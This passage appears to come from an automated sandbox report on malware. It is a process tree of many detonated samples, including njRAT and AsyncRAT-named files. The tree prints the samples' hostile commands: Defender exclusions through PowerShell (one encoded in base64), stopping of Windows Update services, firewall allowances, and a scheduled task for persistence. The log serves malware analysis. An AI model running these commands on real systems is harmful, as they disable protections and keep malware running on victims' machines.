- Windows security bypass
- Executes dropped EXE
- Windows security modification
PID:4884 -
C:\Users\Admin\AppData\Local\Temp\337368602.exeC:\Users\Admin\AppData\Local\Temp\337368602.exe5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4964 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f6⤵PID:2312
-
C:\Windows\system32\reg.exereg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f7⤵PID:568
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"6⤵PID:1720
-
C:\Windows\system32\schtasks.exeschtasks /delete /f /tn "Windows Upgrade Manager"7⤵PID:4888
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1280732738.exeC:\Users\Admin\AppData\Local\Temp\1280732738.exe5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6012
-
-
C:\Users\Admin\AppData\Local\Temp\3320025174.exeC:\Users\Admin\AppData\Local\Temp\3320025174.exe5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5524 -
C:\Users\Admin\AppData\Local\Temp\3404819980.exeC:\Users\Admin\AppData\Local\Temp\3404819980.exe6⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
PID:1512
-
-
-
-
-
C:\Users\Admin\Desktop\Files\njrat.exe"C:\Users\Admin\Desktop\Files\njrat.exe"3⤵
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:580 -
C:\Windows\rundll32.exe"C:\Windows\rundll32.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops autorun.inf file
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
PID:1240 -
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Windows\rundll32.exe" "rundll32.exe" ENABLE5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:220
-
-
-
-
C:\Users\Admin\Desktop\Files\11.exe"C:\Users\Admin\Desktop\Files\11.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:4480 -
C:\Windows\sysarddrvs.exeC:\Windows\sysarddrvs.exe4⤵
- Modifies security service
- Windows security bypass
- Executes dropped EXE
- Windows security modification
- Suspicious behavior: SetClipboardViewer
PID:4256 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"5⤵
- System Location Discovery: System Language Discovery
PID:5968 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1904
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS5⤵PID:1028
-
C:\Windows\SysWOW64\sc.exesc stop UsoSvc6⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:5496
-
-
C:\Windows\SysWOW64\sc.exesc stop WaaSMedicSvc6⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2052
-
-
C:\Windows\SysWOW64\sc.exesc stop wuauserv6⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:5168
-
-
C:\Windows\SysWOW64\sc.exesc stop DoSvc6⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:6120
-
-
C:\Windows\SysWOW64\sc.exesc stop BITS6⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2964
-
-
-
C:\Users\Admin\AppData\Local\Temp\686511152.exeC:\Users\Admin\AppData\Local\Temp\686511152.exe5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3660 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f6⤵PID:3164
-
C:\Windows\system32\reg.exereg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f7⤵PID:4896
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"6⤵PID:5584
-
C:\Windows\system32\schtasks.exeschtasks /delete /f /tn "Windows Upgrade Manager"7⤵PID:5172
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\241632213.exeC:\Users\Admin\AppData\Local\Temp\241632213.exe5⤵
- Executes dropped EXE
PID:2940
-
-
C:\Users\Admin\AppData\Local\Temp\881826859.exeC:\Users\Admin\AppData\Local\Temp\881826859.exe5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1256
-
-
-
-
C:\Users\Admin\Desktop\Files\softina.exe"C:\Users\Admin\Desktop\Files\softina.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:5876 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe "Add-MpPreference -ExclusionPath "C:\Users\Admin\Desktop\Files\softina.exe"; Add-MpPreference -ExclusionProcess "softina.exe"; exit"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
PID:2360
-
-
C:\Users\Admin\AppData\Local\sdkwifhsyaunfs\JAVA_V3.exe"C:\Users\Admin\AppData\Local\sdkwifhsyaunfs\JAVA_V3.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3668 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\sdkwifhsyaunfs\JAVA_V3.exe"; Add-MpPreference -ExclusionProcess "JAVA_V3.exe"; exit"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
PID:5624
-
-
-
-
C:\Users\Admin\Desktop\Files\a.exe"C:\Users\Admin\Desktop\Files\a.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:4596 -
C:\Windows\sysvplervcs.exeC:\Windows\sysvplervcs.exe4⤵
- Modifies security service
- Windows security bypass
- Executes dropped EXE
- Windows security modification
- System Location Discovery: System Language Discovery
- Suspicious behavior: SetClipboardViewer
PID:396 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"5⤵PID:2500
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
PID:3456
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait5⤵
- System Location Discovery: System Language Discovery
PID:1504 -
C:\Windows\SysWOW64\sc.exesc stop UsoSvc6⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:4460
-
-
C:\Windows\SysWOW64\sc.exesc stop WaaSMedicSvc6⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:4468
-
-
C:\Windows\SysWOW64\sc.exesc stop wuauserv6⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:6028
-
-
C:\Windows\SysWOW64\sc.exesc stop DoSvc6⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:1064
-
-
C:\Windows\SysWOW64\sc.exesc stop BITS /wait6⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2872
-
-
-
C:\Users\Admin\AppData\Local\Temp\1327623073.exeC:\Users\Admin\AppData\Local\Temp\1327623073.exe5⤵
- Executes dropped EXE
PID:2400 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f6⤵PID:4108
-
C:\Windows\system32\reg.exereg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f7⤵PID:5340
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"6⤵PID:2360
-
C:\Windows\system32\schtasks.exeschtasks /delete /f /tn "Windows Upgrade Manager"7⤵PID:1860
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\606615002.exeC:\Users\Admin\AppData\Local\Temp\606615002.exe5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:564
-
-
C:\Users\Admin\AppData\Local\Temp\128037285.exeC:\Users\Admin\AppData\Local\Temp\128037285.exe5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4232
-
-
-
-
C:\Users\Admin\Desktop\Files\gawdth.exe"C:\Users\Admin\Desktop\Files\gawdth.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1140 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\1.bat" "4⤵PID:1360
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\clamer.execlamer.exe -priverdD5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4996 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\lofsawd.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\lofsawd.exe"6⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
PID:868
-
-
-
-
-
C:\Users\Admin\Desktop\Files\q1wnx5ir.exe"C:\Users\Admin\Desktop\Files\q1wnx5ir.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5408 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5408 -s 4564⤵
- Program crash
PID:2860
-
-
-
C:\Users\Admin\Desktop\Files\server.exe"C:\Users\Admin\Desktop\Files\server.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3924
-
-
C:\Users\Admin\Desktop\Files\smell-the-roses.exe"C:\Users\Admin\Desktop\Files\smell-the-roses.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:5288 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.funletters.net/readme.htm4⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1724 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x124,0x128,0x12c,0xfc,0x130,0x7ff9d1ec3cb8,0x7ff9d1ec3cc8,0x7ff9d1ec3cd85⤵PID:1144
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1824,12978431846451515564,7161108261779077067,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1836 /prefetch:25⤵PID:4180
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1824,12978431846451515564,7161108261779077067,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2364 /prefetch:35⤵PID:4748
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1824,12978431846451515564,7161108261779077067,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2780 /prefetch:85⤵PID:5688
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1824,12978431846451515564,7161108261779077067,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3164 /prefetch:15⤵PID:5092
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1824,12978431846451515564,7161108261779077067,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3204 /prefetch:15⤵PID:4372
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1824,12978431846451515564,7161108261779077067,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4552 /prefetch:15⤵PID:1388
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1824,12978431846451515564,7161108261779077067,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4600 /prefetch:15⤵PID:3784
-
-
-
-
C:\Users\Admin\Desktop\Files\AsyncClient.exe"C:\Users\Admin\Desktop\Files\AsyncClient.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4904
-
-
C:\Users\Admin\Desktop\Files\j86piuq9.exe"C:\Users\Admin\Desktop\Files\j86piuq9.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2716
-
-
C:\Users\Admin\Desktop\Files\cudo.exe"C:\Users\Admin\Desktop\Files\cudo.exe"3⤵PID:1444
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵PID:5016
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe'5⤵
- Command and Scripting Interpreter: PowerShell
PID:3856
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'MSBuild.exe'5⤵
- Command and Scripting Interpreter: PowerShell
PID:896
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\svcsys'5⤵
- Command and Scripting Interpreter: PowerShell
PID:6676
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svcsys'5⤵
- Command and Scripting Interpreter: PowerShell
PID:6380
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svcsys" /tr "C:\ProgramData\svcsys"5⤵
- Scheduled Task/Job: Scheduled Task
PID:6456
-
-
-
-
C:\Users\Admin\Desktop\Files\newbundle2.exe"C:\Users\Admin\Desktop\Files\newbundle2.exe"3⤵PID:1756
-
-
C:\Users\Admin\Desktop\Files\kitty.exe"C:\Users\Admin\Desktop\Files\kitty.exe"3⤵PID:6856
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6856 -s 5164⤵
- Program crash
PID:6904
-
-
-
C:\Users\Admin\Desktop\Files\gdn5yfjd.exe"C:\Users\Admin\Desktop\Files\gdn5yfjd.exe"3⤵PID:6508
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEQAZQBzAGsAdABvAHAAXABGAGkAbABlAHMAXABnAGQAbgA1AHkAZgBqAGQALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEQAZQBzAGsAdABvAHAAXABGAGkAbABlAHMAXABnAGQAbgA1AHkAZgBqAGQALgBlAHgAZQA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAFQAeQBwAGUASQBkAC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAFQAeQBwAGUASQBkAC4AZQB4AGUA4⤵PID:7628
-
-
-
C:\Users\Admin\Desktop\Files\networks_profile.exe"C:\Users\Admin\Desktop\Files\networks_profile.exe"3⤵PID:7440
-
C:\Users\Admin\Desktop\Files\networks_profile.exe"C:\Users\Admin\Desktop\Files\networks_profile.exe"4⤵PID:7752
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"5⤵PID:6256
-
-
C:\Windows\SYSTEM32\netsh.exenetsh wlan show profiles5⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:3400
-
-
-
-
C:\Users\Admin\Desktop\Files\ardara.exe"C:\Users\Admin\Desktop\Files\ardara.exe"3⤵PID:8176
-
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"4⤵PID:8620
-
-
-
C:\Users\Admin\Desktop\Files\dayum.exe"C:\Users\Admin\Desktop\Files\dayum.exe"3⤵PID:7992
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"4⤵PID:7420
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE5⤵
- Modifies Windows Firewall
PID:2368
-
-
-
-
C:\Users\Admin\Desktop\Files\crypted_c360a5b7.exe"C:\Users\Admin\Desktop\Files\crypted_c360a5b7.exe"3⤵PID:6356
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵PID:1544
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵PID:7580
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵PID:8684
-
-
-
C:\Users\Admin\Desktop\Files\Journal.exe"C:\Users\Admin\Desktop\Files\Journal.exe"3⤵PID:6920
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"2⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3620 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9d88fcc40,0x7ff9d88fcc4c,0x7ff9d88fcc583⤵PID:5196
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1848,i,6553254027333030755,15900441114291298193,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1844 /prefetch:23⤵PID:1936
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1752,i,6553254027333030755,15900441114291298193,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2016 /prefetch:33⤵PID:2568
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2184,i,6553254027333030755,15900441114291298193,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2192 /prefetch:83⤵PID:1900
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3068,i,6553254027333030755,15900441114291298193,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3120 /prefetch:13⤵PID:4576
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3104,i,6553254027333030755,15900441114291298193,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3280 /prefetch:13⤵PID:5572
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3064,i,6553254027333030755,15900441114291298193,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4484 /prefetch:13⤵PID:3136
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4776,i,6553254027333030755,15900441114291298193,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4784 /prefetch:83⤵PID:4524
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4784,i,6553254027333030755,15900441114291298193,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4788 /prefetch:83⤵PID:1360
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4936,i,6553254027333030755,15900441114291298193,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4808 /prefetch:83⤵PID:768
-
-
C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe" --reenable-autoupdates --system-level3⤵
- Drops file in Windows directory
PID:4088 -
C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x244,0x248,0x24c,0x220,0x250,0x7ff7fef94698,0x7ff7fef946a4,0x7ff7fef946b04⤵
- Drops file in Windows directory
PID:1416
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5104,i,6553254027333030755,15900441114291298193,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4792 /prefetch:83⤵PID:2928
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4804,i,6553254027333030755,15900441114291298193,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5240 /prefetch:83⤵PID:2220
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4816,i,6553254027333030755,15900441114291298193,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5124 /prefetch:83⤵PID:3108
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=5224,i,6553254027333030755,15900441114291298193,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5292 /prefetch:23⤵PID:5240
